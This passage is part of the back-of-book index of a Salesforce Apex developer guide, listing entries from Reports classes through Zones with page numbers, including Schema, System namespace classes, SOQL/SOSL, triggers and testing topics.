Reports.ReportMetadata
class 1257
Reports.ReportResults
class 1263
Reports.ReportType
class 1266
1946
Index
Reports.ReportTypeColumn
class 1267
Reports.ReportTypeColumnCategory
class 1269
Reports.ReportTypeMetadata
class 1270
Reports.SummaryValue
class 1270
Requests 123
Reserved keywords 1912
REST Web Services
Apex REST code samples 247
Apex REST introduction 241
Apex REST methods 242
exposing Apex classes 241
RestResource annotation 86
retrieveCode call 442
Role hierarchy 173
rollback method 123
Rounding modes 1449
RowCause field values 174
runAs method
package versions 449
using 428, 449
runTests call 426, 1892
S
Salesforce version 96
Sample application
code 1903
data model 1900
overview 1900
tutorial 1900
Sandbox organizations, deploying Apex 438
Schedulable interface 218
Schedule Apex 218
Scheduler
best practices 224
schedulable interface 218
testing 220
Schema
namespace 1272
Schema.ChildRelationship
class 1273
Schema.DataCategory
class 1275
Schema.DataCategoryGroupSobjectTypePair
class 1276
Schema.DescribeColorResult
class 1279
Schema.DescribeDataCategoryGroupResult
class 1280
Schema.DescribeDataCategoryGroupStructureResult
class 1283
Schema.DescribeFieldResult
class 1285
Schema.DescribeIconResult
class 1300
Schema.DescribeSObjectResult
class 1303
Schema.DescribeTabResult
class 1311
Schema.DescribeTabSetResult
class 1314
Schema.DisplayType
enum 1317
Schema.FieldSet
class 1318
Schema.FieldSetMember
class 1322
Schema.PicklistEntry
class 1324
Schema.RecordTypeInfo
class 1326
Schema.SOAPType
enum 1328
Schema.SObjectField
class 1328
Schema.sObjectType
class 1329
SearchPromotionRule 297
Security
and custom API calls 238, 247
certificates 354
class 172
code 186
formulas 187
Visualforce 187
SelectOption
example 1670
instantiation 1670
SendEmailError
class 1181
SendEmailResult
class 1182
SessionManagement
classes 513
1947
Index
Set
collection 1675
Set accessors 63
setFixedSearchResults method 430
Sets
iterating 52
iteration for loops 52
understanding 32
with sObjects 151
setSavepoint method 123
Severity, messages 471
Sharing
access levels 175
and custom API calls 238, 247
Apex managed 173
reason field values 174
recalculating 180
rules 173
understanding 173
Sharing reasons
database object 1118
recalculating 180
understanding 175
SingleEmailMessage
class 1171, 1183
Site
namespace 1332
Site class 298
size trigger variable 198
SOAP and overloading 240
SOAP API calls
compileAndTest 439, 444
compileClasses 444
compileTriggers 444
custom 238
executeAnonymous 195
retrieveCode 442
runTests 426
transaction control 123
when to use 3
SOAP API objects
ApexTestQueueItem 427
ApexTestResult 427
sObject
Class 1702
sObjects
access all 159
accessing fields through relationships 135
data types 26, 102
sObjects (continued)
dereferencing fields 134
describe result methods 1303
describe results 155
expressions 150
fields 103
formula fields 134
lists 145
mixed DML in test methods 126
sorting 147
that cannot be used together 124
that do not support DML operations 128
tokens 155
validating 104
SOQL injection 166
SOQL queries
aggregate functions 136
Apex variables in 141
dynamic 165
execution limits 258
expressions 38
for loops 132, 143
foreign key 136
inline, locking rows for 131
large result lists 137
limit methods 1537
locking 132
null values 139
parent-child relationship 136
Polymorphic relationships 140
preventing injection 166
querying all records 143
understanding 133
working with results 134
Sorting
lists 31
SOSL injection 166
SOSL queries
Apex variables in 141
dynamic 166
execution limits 258
expressions 38
limit methods 1537
preventing injection 166
testing 430
understanding 133
working with results 134
Special characters 26
SSL authentication 354
1948
Index
StandardController
example 475
StandardController class
instantiation 474
StandardSetController
example 480
StandardSetController class
instantiation 480
Start and stop test 430
Statements
assignment 45
execution limits 258
if-else 49
locking 131
method invoking 56
Static
initialization code 60
methods 60
variables 60
StaticResourceCalloutMock
testing callouts 349
String
primitive data type 1720
Strings
data type 26
super keyword 75
Support
namespace 1334
Support Classes 305
Support.EmailTemplateSelector
interface 1334
Support.MilestoneTriggerTimeCalculator
Interface 1336
Syntax
case sensitivity 36
comments 45
variables 35
System
namespace 1338
System architecture, Apex 4
System Log console
using 385
System methods
namespace prefixes 93
system mode 292
System namespace prefix 93
System validation 205
System.Answers
class 1342
System.ApexPages
class 1344
System.Approval
class 1347
System.BusinessHours
class 1353
System.Cases
class 1357
System.Comparable
interface 1357
System.Comparable Interface
compareTo method 1357
System.Cookie
class 1360
System.Crypto
class 1364
System.Database
class 1386
System.EncodingUtil
class 1465
System.Http
class 1472
System.HttpCalloutMock
interface 1473
System.HttpCalloutMock Interface
respond method 1473
System.HttpRequest
class 1474
System.HttpResponse
class 1483
System.Ideas
class 1495
System.InstallHandler
interface 1500
System.InstallHandler interface
onInstall method 1500
System.JSON
class 1505
System.JSONGenerator
class 1510
System.JSONParser
class 1524
System.JSONToken
enum 1536
System.Limits
class 1537
System.Matcher
class 1580
1949
Index
System.Matcher methods
See also Pattern methods 1580
System.Math
class 1593
System.Messaging
class 1618
System.MultiStaticResourceCalloutMock
class 1621
System.Network
class 1624
System.PageReference
class 1628
System.Pattern
class 1637
System.Queueable
interface 1641
System.QueueableContext
interface 1643
System.RemoteObjectController
class 1648
System.ResetPasswordResult
class 1651
System.RestContext
class 1652
System.RestRequest
class 1653
System.RestResponse
class 1659
System.Schedulable
interface 1663
System.SchedulableContext
interface 1664
System.Schema
class 1664
System.Search
class 1669
System.SelectOption
class 1669
System.Site
class 1686
System.StaticResourceCalloutMock
class 1717
System.System
class 1792
System.Test
class 1811
System.Time
class 1820
System.TimeZone
class 1824
System.Type
class 1827, 1855
System.UninstallHandler interface
onUninstall method 1833
System.URL
class 1835
System.UserInfo
class 1844
System.Version
class 1852
System.WebServiceMock
interface 1857
System.WebServiceMock Interface
doInvoke method 1857
System.XmlStreamReader
class 1858
System.XmlStreamWriter
class 1872
T
Territory Management 2.0 321
Territory2 trigger 321
Test methods
Visualforce 1811
Testing
best practices 431
callouts 347349
callouts with DML 352
example 432
governor limits 430
runAs 428, 449
using start and stop test 430
what to test 414
testMethod keyword 415
Tests
common utility classes 424
data 420
data access 420
for SOSL queries 430
isTest annotation 81
running 425
test data 422
TestVisible annotation 418
understanding 413414
TestVisible annotation 85
this keyword 76
Throw statements 401
1950
Index
Time
data type 26
Tokens
fields 156
reserved 1912
sObjects 155
Tools 439
Traditional for loops 51
Transaction control statements
triggers and 198
understanding 123
Transactions 256257
transient keyword 77
Transparent bounds 376
Trigger
step by step walkthrough 1922, 24
Trigger-ignoring operations 208
Triggers
API version 96
bulk exception handling 129
bulk processing 197
bulk queries 201
common idioms 201
context variable considerations 200
context variables 198
defining 203
design pattern 211
entity and field considerations 209
events 198
exceptions 211
execution order 205
ignored operations 208
isValid flag 203
maps and sets, using 201
merge events and 204
recovered records 205
syntax 198
transaction control 123
transaction control statements 198
undelete 205
understanding 196
unique fields 201
Try-catch-finally statements 401
Tutorial 19, 1900
Type resolution 95
Types
Primitive 26
sObject 102
understanding 26
U
Undelete database method 455
Undelete statement 455
Undelete triggers 205
Unit tests
for SOSL queries 430
running 425
understanding 415
Unlimited Edition, deploying Apex 438
Update database method 453
Update statement 453
Upsert database method 453
Upsert statement 453
UrlRewriter
interface 1332
User managed sharing 173
User-defined methods, Apex 56
UserProfiles
ConnectApi.UserProfiles 970
UserTerritory2Association trigger 321
V
Validating sObject and field names 104
Validation, system 205
Variables
access modifiers 59
declaring 35
in SOQL and SOSL queries 141
instance 60
local 60
precedence 94
static 60
trigger context 198
using with classes 55
Version settings
API version 96
package versions 97
understanding 95
Very large SOQL queries 137
Virtual definition modifier 55
Visual Workflow
accessing flow variables 306
Visualforce
ApexPages methods 1344
message severity 471
pages 252
RemoteObjectController methods 1648
1951
Index
Visualforce (continued)
security tips 186
when to use 3
W
Walk-through, sample application 1900
Web services API calls
available for Apex 1880
compileAndTest 1884
compileClasses 1889
compileTriggers 1890
executeanonymous 1891
runTests 1892
WebService methods
considerations 239
exposing data 238
overloading 240
understanding 238
Where clause, SOQL query 141
While loops 50
Wildcards 290
with sharing keywords 78, 292
without sharing keywords 78, 292
Workflow 205
Writing Apex 1213
WSDLs
creating an Apex class from 333
debugging 345
example 338
generating 238
mapping headers 345
overloading 240
runtime events 345
testing 341
testing and DML 344
X
XML reader methods 1858
XML Support
reading using streams 364
using streams 364, 367
using the DOM 368
XML writer methods 1872
Z
Zones 320
1952